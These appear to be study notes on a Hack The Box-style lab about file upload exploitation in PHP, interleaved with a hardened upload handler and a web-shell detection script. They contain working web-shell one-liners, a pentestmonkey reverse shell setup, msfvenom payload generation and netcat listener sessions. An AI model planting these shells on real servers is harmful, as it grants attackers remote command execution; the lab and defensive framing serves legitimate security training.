# Basic Exploitation

## Absent Validation

This is the case when the web application `does not have any form of validation filters` on the uploaded files, allowing the upload of any file type by default.

### Arbitrary File Upload

We can drag and drop any file we want, and its name will appear on the upload form, including `.php` files:

<figure><img src="/files/lj136xGlf1dgGubeESjy" alt=""><figcaption></figcaption></figure>
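The fix on the server side is validation that the exercise lacks. The following PHP upload handler is an added example (not code from the page or the HTB module): it checks only the final extension against an allowlist, verifies the real content type with `finfo`, renames the file to a random name and stores it outside the web root. The form field name `image` and the `$uploadDir` path are assumptions.

```php
<?php
// Added example (not from the exercise): a hardened upload handler.
// Assumptions: the form field is named "image" and $uploadDir lies outside the web root.
$uploadDir = '/var/www/uploads_private'; // hypothetical path, never served directly
$maxBytes  = 2 * 1024 * 1024;

// Allowlist: permitted extensions and the MIME type the bytes must really have.
$allowed = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

function rejectUpload(string $reason): void
{
    http_response_code(400);
    exit('Upload rejected: ' . $reason);
}

if (!isset($_FILES['image']) || $_FILES['image']['error'] !== UPLOAD_ERR_OK) {
    rejectUpload('no file or transport error');
}
$file = $_FILES['image'];
if ($file['size'] > $maxBytes) {
    rejectUpload('file too large');
}

// Allowlist, not denylist: only the final extension of the client-supplied name
// is consulted, and anything not in $allowed is refused.
$ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
if (!array_key_exists($ext, $allowed)) {
    rejectUpload('extension not allowed');
}

// Inspect the actual bytes: the Content-Type header is chosen by the client.
$realMime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
if ($realMime !== $allowed[$ext]) {
    rejectUpload('content does not match extension');
}

// Store under a random server-chosen name so no client string reaches the path,
// and outside the web root so the web server never executes an upload.
$storedName = bin2hex(random_bytes(16)) . '.' . $ext;
if (!move_uploaded_file($file['tmp_name'], $uploadDir . '/' . $storedName)) {
    rejectUpload('could not store file');
}
echo 'Stored as ' . htmlspecialchars($storedName, ENT_QUOTES, 'UTF-8');
```

The MIME check alone does not stop image files that also carry code, which is why the random name and the non-served storage directory do the real work; files are then handed out through a download script rather than a direct URL.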

***

### Identifying Web Framework

One easy method to determine what language runs the web application is to visit the `/index.ext` page, where we would swap out `ext` with various common web extensions, like `php`, `asp`, `aspx`, among others, to see whether any of them exist.

For example, when we visit our exercise below, we see its URL as `http://SERVER_IP:PORT/`, as the `index` page is usually hidden by default. But, if we try visiting `http://SERVER_IP:PORT/index.php`, we would get the same page, which means that this is indeed a `PHP` web application.

We do not need to do this manually, of course, as we can use a tool like Burp Intruder for fuzzing the file extension using a [Web Extensions](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt) wordlist, as we will see in upcoming sections.

{% embed url="https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt" %}

<figure><img src="/files/uN2DUbpW2xrA4Lhc7h2w" alt=""><figcaption></figcaption></figure>

***

### Vulnerability Identification

As an initial test to identify whether we can upload arbitrary `PHP` files, let's create a basic `Hello World` script to test whether we can execute `PHP` code with our uploaded file.

To do so, we will write `<?php echo "Hello HTB";?>` to `test.php`, and try uploading it to the web application:

<figure><img src="/files/1Cin9iybk44WfnBOefeG" alt=""><figcaption></figcaption></figure>

***

### PoCs - Questions

* Try to upload a PHP script that executes the (hostname) command on the back-end server, and submit the first word of it as the answer.

```php
<?php
// Save as a PHP file (for example hsh.php) and upload it; the first word of the output is the answer
system('hostname');
?>
```

***

## Upload Exploitation

### Web Shells

One good option for `PHP` is [phpbash](https://github.com/Arrexel/phpbash), which provides a terminal-like, semi-interactive web shell. Furthermore, [SecLists](https://github.com/danielmiessler/SecLists/tree/master/Web-Shells) provides a plethora of web shells for different frameworks and languages.

Let's try to upload `phpbash.php` from [phpbash](https://github.com/Arrexel/phpbash) to our web application, and then navigate to its link by clicking on the Download button:

<figure><img src="/files/JN41leBN4ctJ3OXgj2Py" alt=""><figcaption></figcaption></figure>

### Writing Custom Web Shell

For example, with `PHP` web applications, we can use the `system()` function that executes system commands and prints their output, and pass it the `cmd` parameter with `$_REQUEST['cmd']`, as follows:

```php
<?php system($_REQUEST['cmd']); ?>
```

or

```php
<?php system($_GET['cmd']); ?>
```

<figure><img src="/files/tfzITetuscpYqVpdbDqV" alt=""><figcaption></figcaption></figure>
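From the detection side, a stored upload that looks like the one-liners above is easy to recognise. The following PHP script is an added example (not code from the page or the HTB module) that classifies files in an upload directory by those indicators: a server-executable extension, a PHP open tag in what should be static content, and a command sink fed from a request parameter. The directory path and the sample files are constructed.

```php
<?php
// Added example (not from the page): flag uploaded files that look like PHP web shells.
// $uploadDir is a hypothetical path; run this from cron or a post-upload hook.
$uploadDir = '/var/www/html/uploads';

// A stored upload is suspicious when it has a server-executable extension, contains
// a PHP open tag at all (uploads should be static files), or pairs a command sink
// with request-controlled input, the shape of the one-liners shown above.
function classifyUpload(string $name, string $body): array
{
    $findings = [];
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (in_array($ext, ['php', 'phtml', 'phar', 'php3', 'php5', 'php7'], true)) {
        $findings[] = 'executable extension';
    }
    if (preg_match('/<\?(php|=)/i', $body)) {
        $findings[] = 'PHP open tag';
    }
    $sink  = preg_match('/\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(/i', $body);
    $input = preg_match('/\$_(GET|POST|REQUEST|COOKIE)\s*\[/', $body);
    if ($sink && $input) {
        $findings[] = 'command sink fed by a request parameter';
    }
    return $findings;
}

// Constructed samples, so the classifier can be exercised without touching the disk.
$samples = [
    'photo.png'  => "\x89PNG\r\n\x1a\n...image bytes...",
    'readme.txt' => "Plain notes about the project.",
    'ws.php'     => "<?php system(\$_GET['cmd']); ?>",
];
foreach ($samples as $name => $body) {
    $hits = classifyUpload($name, $body);
    printf("%-11s %s\n", $name, $hits ? implode('; ', $hits) : 'clean');
}

// Sweep the real upload directory and report anything that matches.
if (is_dir($uploadDir)) {
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($uploadDir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        $hits = classifyUpload($file->getFilename(), (string) file_get_contents($file->getPathname()));
        if ($hits) {
            printf("SUSPICIOUS %s: %s\n", $file->getPathname(), implode('; ', $hits));
        }
    }
}
```

Of the three constructed samples only `ws.php` is reported, with all three indicators; the two static files come back clean.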

***

### Reverse Shell

Let's download a reverse shell script, like the [pentestmonkey](https://github.com/pentestmonkey/php-reverse-shell) one, and then open it in a text editor to input our `IP` and listening `PORT`, which the script will connect to. For the `pentestmonkey` script, we can modify lines `49` and `50` and input our machine's IP/PORT:

{% embed url="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php" %}

```php
// Lines 49 and 50 of php-reverse-shell.php
$ip = 'OUR_IP';     // CHANGE THIS
$port = OUR_PORT;   // CHANGE THIS
```

On our machine, we start a listener on the same port and wait for the connection:

```shell-session
eldeim@htb[/htb]$ nc -lvnp OUR_PORT
listening on [any] OUR_PORT ...
connect to [OUR_IP] from (UNKNOWN) [188.166.173.208] 35232
> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

***

### Generating Custom Reverse Shell Scripts

Tools like `msfvenom` can generate a reverse shell script in many languages and may even attempt to bypass certain restrictions in place. We can do so as follows for `PHP`:

```shell-session
eldeim@htb[/htb]$ msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
...SNIP...
Payload size: 3033 bytes

eldeim@htb[/htb]$ nc -lvnp OUR_PORT
listening on [any] OUR_PORT ...
connect to [OUR_IP] from (UNKNOWN) [181.151.182.286] 56232
# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

***

### PoCs - Questions

* Try to exploit the upload feature to upload a web shell and get the content of /flag.txt

> We can upload a basic `$_GET` web shell saved as `ws.php`, or the `phpbash.php` shell downloaded from GitHub:

```php
<?php system($_GET['cmd']); ?>
```

